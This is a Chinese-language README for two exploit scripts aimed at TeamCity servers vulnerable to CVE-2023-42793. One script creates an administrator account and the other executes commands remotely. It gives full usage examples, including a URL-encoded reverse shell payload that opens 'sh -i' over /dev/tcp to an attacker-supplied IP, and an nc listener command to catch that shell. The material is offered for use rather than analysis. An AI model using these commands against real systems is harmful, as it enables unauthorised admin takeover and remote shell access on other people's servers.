首先使用
exploit.py为你创建一个管理员账户,然后使用rce.py在目标上执行命令,关于反弹 Shell 请查看这里
该脚本利用 CVE-2023-42793 在 TeamCity 服务器上创建管理员账户。它向目标 URL 发送 POST 请求,使用指定或随机凭据创建管理员用户。
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL:目标 URL(必填)-v, --verbose:启用详细模式-n, --username USERNAME:指定用户名(默认随机)-p, --password PASSWORD:指定密码(默认随机)-e, --email EMAIL:指定邮箱(默认随机)-t, --token-file:保存令牌的文件pip3 install -r requirements.txt使用随机用户名、密码和邮箱进行利用:
python exploit.py -u http://target.com
使用指定的用户名、密码和邮箱进行利用:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
成功利用后,脚本会打印所创建管理员账户的 URL、用户名和密码,并将输出保存到令牌文件中。
描述 此脚本允许在受影响的 TeamCity 服务器上执行命令,利用 CVE-2023-42793。它首先启用调试进程,然后使用相应的 API 端点执行指定命令。
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL:目标 URL(必填)-t, --token-file:指定包含令牌的文件-c, --command COMMAND:指定要执行的命令(RCE)-P, --port PORT:指定端口(默认为 80)使用指定命令进行利用:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555